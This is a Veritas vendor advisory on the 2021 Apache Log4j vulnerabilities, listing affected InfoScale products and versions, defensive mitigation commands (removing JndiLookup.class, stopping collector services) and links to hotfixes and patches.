About Apache Log4j Vulnerabilities
Apache Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services. The Apache Software Foundation has released few security advisories to address remote code execution vulnerabilities affecting Log4j versions 2.0-beta9 to 2.16. A remote attacker could exploit this vulnerability to take control of an affected system.
More information is available from the Apache Announcement and recommends upgrading to the latest Log4j or applying recommended mitigations immediately.
Issues
CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.
Severity: Critical
Base CVSS Score: 10.0
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.
Base CVSS Score: 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)
Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0
CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation.
Base CVSS Score 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Versions Affected: All versions from 2.0-beta9 to 2.16.0
CVE-2021-4104 (JMSAppender) : JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration.
CVE-2021-44832 : Infoscale and VIOM patches were released with 2.17.1. Links updated below.
CVE-2019-17571: Included in Log4j 1.2 is a Socket Server class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.
CVSS Base Score: 9.8 (Critical Severity)
Note1:
The below mentioned mitigation steps and HF are released considering both vulnerabilities CVE-2021-45046 & CVE-2021-44228.
Note2:
CVE-2021-45105 is not exploitable in InfoScale Licensing Service and Veritas InfoScale Operations Manager – Management Server.
Note3:
Windows MHs were impacted with these vulnerabilities CVE-2021-4104 & CVE-2019-17571. Permanent fix included in the below table.
Affected Versions
Veritas is aware of this recently announced zero-day vulnerability and both Product Security and Development teams are actively reviewing our software to determine if the vulnerability exists in any of our products.
If we determine a particular product is impacted by the issue, Veritas will provide temporary mitigation guidance while we work to quickly provide a patch to permanently address the issue. This is an urgent issue, and we are working aggressively to help keep our customers secure. We will provide updates and guidance as soon as possible
Product / Component |
Version |
Mitigation Steps |
Permanent Fix |
Veritas InfoScale Operations Manager – Management Server |
7.3.1 and lower (Linux) |
Veritas strongly recommends customers upgrade to Veritas InfoScale Operations Manager 7.4.2 or the latest release in order to be able to perform the mitigation steps provided below. |
https://www.veritas.com/support/en_US/downloads/update.UPD329228
Note 1: Note 2 :
|
Veritas InfoScale Operations Manager – Management Server |
7.3.1 and lower(Windows) | Veritas strongly recommends customers upgrade to Veritas InfoScale Operations Manager 7.4.2 or the latest release. |
|
Veritas InfoScale Operations Manager – Management Server |
7.4 (Linux) |
Perform the mitigation steps provided below only if
|
|
| Veritas InfoScale Operations Manager – Management Server | 7.4.2, 8.0 (Linux) | Follow Mitigation steps. | |
| Veritas InfoScale Operations Manager – Management Server | 7.4, 7.4.2, 8.0 (Windows) |
Please stop the cmsCollector on every reboot. %ProgramFiles%\Veritas\VRTSsfmcs\bin\cmsCollector.exe -tcstop |
|
| Veritas InfoScale Operations Manager – Management Server | 7.0 -> 8.0 ( Windows VIOM Agent (Managed Hosts ) | No mitigation steps. | https://www.veritas.com/support/en_US/downloads/update.UPD329228 Note :
|
| Veritas InfoScale Operations Manager – Management Server | 7.0 and earlier Windows VIOM Agent (Managed Hosts ) |
No mitigation steps. | 1) Upgrade to the latest VIOM Agent ( 7.4.2.500) 2) Install the hotfix https://www.veritas.com/support/en_US/downloads/update.UPD329228 OR Remove the “C:\Program Files\Veritas\VRTSsfmh\lib\jars\vmf.” Folder. |
Infoscale Licensing Service |
8.0 |
N/A. Not using java. | |
| Infoscale Licensing Service | 8.0 Containers (Kubernetes / OpenShift ) | No mitigation steps. |
If InfoScale version 8.0 or 8.0.1 is already deployed, then remove it and perform fresh deployment of InfoScale version 8.0.20. 1. For OpenShift clusters with internet connectivity, install InfoScale Operator Bundle 8.0.20 from Red Hat catalog(Operator Hub). Latest InfoScale Operator Bundle (8.0.20) is available at the below location. 2. For OpenShift clusters with restricted network environment and for Kubernetes, InfoScale image and YAML tarball is available at Veritas Download Center at below location , https://www.veritas.com/support/en_US/downloads/update.UPD713174 |
InfoScale Licensing Service |
7.4.3 |
Perform the mitigation steps provided below |
Fix details included below the mitigation steps.
Note : For 6.2 --> 7.4 (Linux/Unix) , For 7.0 -> 7.4 (Windows) install the Hot Fix only if UIS licensing service deployed by specifically installing the sig_licensing update. This can be verified in the systems by checking the presence of the file. Linux/Unix:
Windows: Go to InfoScale-Installation directory Example-
|
InfoScale Licensing Service |
7.4.1 & 7.4.2
|
Recommendation is to upgrade to the Latest VRTSvlic patch (Python based Collector) for Linux and for Windows sig_licensing-WIN-Patch (Python based Collector) for permanent Solution. or Follow the mitigation steps as a temporary workaround. |
|
InfoScale Licensing Service |
6.2 - > 7.4 (Linux/Unix) |
These versions are vulnerable only if UIS licensing service is deployed by specifically installing the sig_licensing update. This can be verified in the systems by checking this file. Linux/Unix:
In case files are available, Stop the “TelemetryCollector” as mentioned in the mitigation steps. |
|
| InfoScale Licensing Service | 7.0 -> 7.4 (Windows) | These versions are vulnerable only if UIS licensing service is deployed by specifically installing the sig_licensing update. This can be verified in the systems by checking this file. Windows: Go to InfoScale-Installation directory Example-
In case files are available, Stop the “TelemetryCollector” as mentioned in the mitigation steps. |
|
| Storage Foundation Licensing Service | 6.1 and earlier (Linux/Unix). |
N/A. Not using java. | |
| Storage Foundation Licensing Service | 7.4.3 , 6.1 and earlier (Windows) | Not impacted. | |
Veritas Management Console( Java GUI ) & Veritas Enterprise Administrator (VEA) |
All Versions | These tools do not use Log4j, so not exposed . |
*** This KB article covers mitigation steps for products/components identified in the above table ***
Please revisit this document for any changes as we continue our investigation
When making changes recommended below, please see the following notes.
NOTE 1 : JAVA GUI and VEA are not using Log4j so not exposed
NOTE 2 : For VIOM Management HA-DR servers, ensure the mitigation steps should be completed on all active and inactive nodes of the cluster.
Mitigation steps for Veritas InfoScale Management Primary server
Mitigation for Veritas InfoScale Operations Manager (VIOM) 7.4, 7.4.2 and 8.0 - Linux
1) Login into the VIOM Management Server as an Admin/root user.
2) Stop VIOM web server.
# /opt/VRTSsfmcs/bin/vomsc --stop web
3) Update JndiLookup java class in /opt/VRTSsfmcs/webgui/tomcat/lib/log4j-core.jar file.
# for log4jcore in `find /opt/VRTSsfmcs -name \*log4j\*core\*.jar 2> /dev/null`;do echo “$log4jcore”; zip -q -d $log4jcore org/apache/logging/log4j/core/lookup/JndiLookup.class;done
Note : zip software required to run the above command.
Example Output: /opt/VRTSsfmcs/webgui/tomcat/lib/log4j-core.jar
4) Start web service. # /opt/VRTSsfmcs/bin/vomsc --start web
5) Stop cmsCollector service .
# /opt/VRTSsfmcs/bin/cmsCollector -tcstop
6) Verify cmsCollector status. # /opt/VRTSsfmcs/bin/cmsCollector -status
Note 1 : Step 5 & 6 need to be done for every reboot.
Note 2 : Ignore the “Either cmsCollector process is not running or valid license key is not installed for this Management Server.” fault in VIOM Management Console.
Mitigation steps for Veritas InfoScale Licensing Service
Linux, UNIX Platforms (All affected versions):
Stop the Telemetry Collector. You need to perform this step after every system reboot.
# /opt/VRTSvlic/tele/bin/TelemetryCollector -tcstop
# /opt/VRTSvlic/tele/bin/TelemetryCollector -status ( should be stopped )
Windows Platform (All affected versions):
Stop the Telemetry Collector process. You need to perform this step after every system reboot.
Go to InfoScale installation directory
Example- C:\Program Files\Veritas\Veritas Shared\VPI\{F834E070-8D71-4c4b-B688-06964B88F3E8}\{7.4.20000.1}\
Note : {F834E070-8D71-4c4b-B688-06964B88F3E8}\{7.4.20000.1} – This could be different on InfoScale Node w.r.t. host and InfoScale version.
1. Open command prompt and go to above mentioned path
2. run - TelemetryCollector.exe -tcstop
Ignore the “TelemetryCollector process is not running on this host” fault in VIOM Management Console if InfoScale server is reporting to VIOM Management Server.
Permanent Fix for Veritas InfoScale Licensing Service
Links to permanent fix (replaced Java with Python for InfoScale)
Windows (7.4.2):
sig_licensing-WIN-Patch-7.4.2.300: https://www.veritas.com/support/en_US/downloads/update.UPD321727.html
RHEL (7.4.2):
RHEL7 7.4.2 U3: https://www.veritas.com/support/en_US/downloads/update.UPD248334.html
RHEL8 7.4.2 U3: https://www.veritas.com/support/en_US/downloads/update.UPD251267
SLES12 (7.4.2):
7.4.2 U3: https://www.veritas.com/support/en_US/downloads/update.UPD966604
SLES15 (7.4.2) : Includes SLES 15 SP3 support
7.4.2 : https://www.veritas.com/support/en_US/downloads/update.UPD772018
Solaris (7.4.2):
SPARC infoscale-sol11_sparc-Patch-7.4.2.1200: https://www.veritas.com/support/en_US/downloads/update.UPD553948
X64 infoscale-sol11_x64-Patch-7.4.2.1200: https://www.veritas.com/support/en_US/downloads/update.UPD584298
AIX (7.4.2):
infoscale-aix-Patch-7.4.2.1200: https://www.veritas.com/support/en_US/downloads/update.UPD800834
Note :
1) All Above Permanent fixes for Linux/Unix environments requires Downtime.
2) For Linux/Unix, use CPI patch for 7.4.2 Update 3 as well as for the P patches mentioned above.
https://www.veritas.com/support/en_US/downloads/update.UPD298738
Patches for all platforms for 7.4.1 can be downloaded from the below locations:
Windows (7.4.1):
sig_licensing-WIN-Patch-7.4.1.300: https://www.veritas.com/support/en_US/downloads/update.UPD469608
RHEL (7.4.1):
RHEL6 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD605225
RHEL7 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD691569
RHEL8 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD474669
SLES (7.4.1):
SLES12 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD365798
SLES15 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD666944
Solaris (7.4.1):
SPARC Solaris 11 7.4.1 U6 : https://www.veritas.com/support/en_US/downloads/update.UPD202244
X86 Solaris 11 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD982913
AIX (7.4.1)
AIX 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD511843
SLES 11 (7.4.1) is not included in 7.4.1 update 6 , so Licensing patch released as component patch as below.
https://www.veritas.com/support/en_US/downloads/update.UPD518518
Note :
1) All Above Permanent fixes for Linux/Unix environments requires Downtime.
2) For Linux/Unix, use CPI patch for 7.4.1 Update 6 as well as for the P patches mentioned above.
https://www.veritas.com/support/en_US/downloads/update.UPD715008
Hot fix for Veritas InfoScale Licensing Service
For InfoScale 7.4 to 7.4.3 (sig_licensing-log4j-2.17.1-HF-7.4-to-7.4.3)
Supported Operating Systems: RHEL6/7/8 x86-64, SLES11/12/15 x86-64 ,Solaris 11 SPARC, Solaris 11 x86 , AIX
https://www.veritas.com/support/en_US/downloads/update.UPD838718
For InfoScale 7.0 to 7.3.1 (sig_licensing-log4j-2.17.1-HF-7.0-to-7.3.1)
Supported Operating Systems: RHEL6/7 x86-64 , SLES11/12 x86-64 , Solaris 11 SPARC , Solaris 11 x86 , AIX
https://www.veritas.com/support/en_US/downloads/update.UPD211523
For SF 6.2 to 6.2.1 (sig_licensing-log4j-2.17.1-HF-6.2-to-6.2.1 )
Supported Operating Systems: RHEL6/7 x86-64 , SLES11/12 x86-64 , Solaris 11 SPARC , AIX
https://www.veritas.com/support/en_US/downloads/update.UPD864693
For Infoscale 7.0 to 7.4.2 Windows (InfoScale_sig_licensing_log4j-2.17.1_7.0_to_7.4.2_HF )
Supported Operating Systems: Windows 2012,2016 and 2019 Servers
https://www.veritas.com/support/en_US/downloads/update.UPD190323
Note : Downtime not required for "Veritas Infoscale Licensing Service" HotFix.
Disclaimer
THE SECURITY ADVISORY IS PROVIDED "AS IS" AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID. VERITAS TECHNOLOGIES LLC SHALL NOT BE LIABLE FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THIS DOCUMENTATION. THE INFORMATION CONTAINED IN THIS DOCUMENTATION IS SUBJECT TO CHANGE WITHOUT NOTICE.
Was this content helpful?
Translated Content
Please note that this document is a translation from English, and may have been machine-translated. It is possible that updates have been made to the original version after this document was translated and published. Veritas does not guarantee the accuracy regarding the completeness of the translation. You may also refer to the English Version of this knowledge base article for up-to-date information.